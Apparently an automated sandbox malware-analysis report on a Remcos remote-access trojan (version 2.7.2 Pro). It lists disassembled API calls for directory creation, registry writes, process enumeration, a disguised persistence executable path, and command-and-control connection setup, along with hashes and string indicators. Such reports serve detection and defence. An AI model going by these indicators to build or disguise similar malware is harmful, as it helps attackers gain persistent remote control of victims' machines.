                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090D4
                                        • wcslen.MSVCRT ref: 004090DB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409108
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040911A
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409135
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040913E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409147
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409172
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409189
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091AC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000030,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091CA
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000009,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004091DC
                                          • Part of subcall function 00407E37: wcslen.MSVCRT ref: 00407E46
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00407E5D
                                          • Part of subcall function 00407E37: CreateDirectoryW.KERNELBASE(00000000), ref: 00407E64
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BC68,00415A24,?), ref: 00407E77
                                          • Part of subcall function 00407E37: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?), ref: 00407E84
                                          • Part of subcall function 00407E37: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?), ref: 00407E94
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407E9D
                                          • Part of subcall function 00407E37: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ECB
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?), ref: 00407ED3
                                          • Part of subcall function 00407E37: wcscmp.MSVCRT ref: 00407EE0
                                          • Part of subcall function 00407E37: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?), ref: 00407EF1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004091F9
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409210
                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040921B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409226
                                        • wcscpy.MSVCRT ref: 00409230
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040923F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040924B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409254
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,004140D8,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040926C
                                          • Part of subcall function 0040B8F8: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000), ref: 0040B934
                                          • Part of subcall function 0040B8F8: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B950
                                        • ??3@YAXPAX@Z.MSVCRT ref: 00409280
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034,?), ref: 0040929E
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004092A7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(licence), ref: 004092B7
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,0000000D,00415B14), ref: 004092DA
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000028), ref: 0040938A
                                        • atoi.MSVCRT ref: 00409391
                                        • CreateThread.KERNEL32(00000000,00000000,00413B0F,00000000,00000000,00000000), ref: 004093C0
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000F), ref: 004093CD
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004093E1
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,00000031,00415800), ref: 00409402
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409410
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000011), ref: 00409432
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 00409444
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040945D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409466
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000031), ref: 0040948B
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000010,00000000), ref: 0040949D
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004094B8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094C1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004094CA
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041B964,00415A24,00000000,00000011), ref: 004094F4
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(004140D8,00000000,?,00000000,00000011), ref: 00409501
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,00000000,00000011), ref: 0040950D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409516
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 0040951F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,00000000,00000011), ref: 00409528
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000036,?,?,?,?,00000000,00000011), ref: 00409539
                                        • atoi.MSVCRT ref: 00409540
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                          • Part of subcall function 00409A2F: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                          • Part of subcall function 00409A2F: CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                          • Part of subcall function 00409A2F: Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                          • Part of subcall function 00409A2F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                          • Part of subcall function 00409A2F: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                          • Part of subcall function 00409A2F: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                          • Part of subcall function 00409A2F: Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                          • Part of subcall function 00409A2F: ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                          • Part of subcall function 00409A2F: ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                          • Part of subcall function 00409A2F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000037,?,?,?,00000000,00000011), ref: 00409564
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000011), ref: 0040958C
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000014,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095C2
                                        • ??2@YAPAXI@Z.MSVCRT ref: 004095CF
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000035,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004095E5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409814
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$V01@@$?data@?$basic_string@$??0?$basic_string@V01@$??4?$basic_string@$V?$basic_string@$G@2@@0@$Hstd@@$CreateV10@$??8std@@?begin@?$basic_string@?length@?$basic_string@?size@?$basic_string@G@1@@$CloseD@1@@D@2@@0@D@std@@@std@@Process32$??2@?end@?$basic_string@?find@?$basic_string@A?$basic_string@FileModuleMutexNameNextOpenV12@Valueatoimallocwcslen$??0?$basic_ofstream@??3@??6std@@??9std@@?close@?$basic_ofstream@?substr@?$basic_string@D?$basic_ofstream@D@std@@@0@DirectoryErrorFirstG@2@@0@0@HandleLastObjectQuerySingleSnapshotThreadToolhelp32V10@0@V10@@V?$basic_ostream@WaitY?$basic_string@freewcscmpwcscpy
                                        • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Inj$Normal$ProductName$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Software\$[INFO]$exepath$licence$licence_code.txt$origmsc
                                        • API String ID: 1672879135-643311509
                                        • Opcode ID: 9d157c73442bb5af3ebd929e7d9c312b9f2b5bf56f744dd631c919ccb799b7ea
                                        • Instruction ID: 756b6b72303f02f0a44bbd524559c36dcc88ee27c0131fa1ad94d22a553bdc8a
                                        • Opcode Fuzzy Hash: 9d157c73442bb5af3ebd929e7d9c312b9f2b5bf56f744dd631c919ccb799b7ea
                                        • Instruction Fuzzy Hash: 5862C572A00648EBDB057BB0AC599FE3B29EB84305F04447EF502A72D2DF784D458B6C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040C81C, Relevance: 251.0, APIs: 135, Strings: 8, Instructions: 764sleepnetworkthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,73B743E0,0041BCB0,00000000), ref: 00412492
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,73B743E0,0041BCB0,00000000), ref: 0040C83F
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                        • atoi.MSVCRT ref: 0040C85C
                                        • Sleep.KERNEL32(00000000), ref: 0040C870
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                        • gethostbyname.WS2_32(00000000), ref: 0040C9A2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                        • atoi.MSVCRT ref: 0040C9DE
                                        • htons.WS2_32(00000000), ref: 0040C9E6
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                        • sprintf.MSVCRT ref: 0040CB14
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                        • _itoa.MSVCRT ref: 0040CB37
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00409E7D: GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                          • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040CBCC
                                        • GetTickCount.KERNEL32 ref: 0040CC20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
